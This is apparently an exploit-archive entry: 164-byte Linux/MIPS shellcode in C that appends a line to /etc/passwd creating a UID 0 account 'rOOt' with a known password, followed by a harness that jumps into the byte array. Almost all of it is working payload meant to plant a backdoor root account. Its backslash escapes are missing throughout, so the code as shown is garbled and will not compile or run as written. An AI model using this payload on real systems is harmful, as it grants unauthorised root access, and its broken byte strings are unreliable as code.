# Title : Linux/MIPS - add user(UID 0) with password - 164 bytes
# Published : 2011-11-27
# Author :
/* Title: Linux/MIPS - add user (UID 0) with password - 164 bytes
* Date: 2011-11-24
* Author: rigan - imrigan [at] gmail.com
* Note:
* Username - rOOt
* Password - pwn3d
*/
#include <stdio.h>
char sc[] =
"x24x09x73x50" // li t1,29520
"x05x30xffxff" // bltzal t1,400094 <L>
"x24x09x73x50" // li t1,29520 (nop)
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */
"x3cx0fx30x2f" // lui t7,0x302f
"x35xefx65x74" // ori t7,t7,0x6574
"x3cx0ex63x2f" // lui t6,0x632f
"x35xcex70x61" // ori t6,t6,0x7061
"x3cx0dx73x73" // lui t5,0x7373
"x35xadx77x64" // ori t5,t5,0x7764
"xafxafxffxf3" // sw t7,-13(sp)
"xafxaexffxf7" // sw t6,-9(sp)
"xafxadxffxfb" // sw t5,-5(sp)
"xafxa0xffxff" // sw zero,-1(sp)
"x27xa4xffxf4" // addiu a0,sp,-12
"x24x05x01x6d" // li a1,365
"x24x02x0fxa5" // li v0,4005
"x01x01x01x0c" // syscall 0x40404
"xafxa2xffxfc" // sw v0,-4(sp)
/* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bashn", 45); */
"x8fxa4xffxfc" // lw a0,-4(sp)
"x23xe5x10x0c" // addi a1,ra,4108
"x20xa5xf0x60" // addi a1,a1,-4000
"x24x09xffxd3" // li t1,-45
"x01x20x30x27" // nor a2,t1,zero
"x24x02x0fxa4" // li v0,4004
"x01x01x01x0c" // syscall 0x40404
/* close(fd); */
"x24x02x0fxa6" // li v0,4006
"x01x01x01x0c" // syscall 0x40404
/* exit(0); */
"x28x04xffxff" // slti a0,zero,-1
"x24x02x0fxa1" // li v0,4001
"x01x01x01x0c" // syscall 0x40404
/* "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bashn" */
"x72x4fx4fx74"
"x3ax58x4ax31"
"x47x56x2ex6e"
"x79x46x46x4d"
"x6fx49x3ax30"
"x3ax30x3ax72"
"x6fx6fx74x3a"
"x2fx72x6fx6f"
"x74x3ax2fx62"
"x69x6ex2fx62"
"x61x73x68x0a";
/*
 * Test harness: prints the length of sc as measured by strlen() and then
 * transfers control to the array through a function pointer.
 *
 * strlen() stops at the first zero byte, so the printed size is only the
 * full length when the array contains no NUL before its terminator.
 *
 * NOTE(review): the call relies on the memory holding sc being executable;
 * where data pages are mapped non-executable (NX / W^X) it is expected to
 * fault instead of running. Only <stdio.h> is included in the visible file,
 * so strlen() has no prototype here, its size_t result is passed to "%d",
 * and a data pointer is assigned to a function pointer without a cast -
 * all of which a strict compiler will reject or warn about.
 */
void main(void)
{
    void (*entry)(void);

    printf("size: %dn", strlen(sc));

    /* Treat the start of the byte array as the entry point. */
    entry = sc;
    (*entry)();
}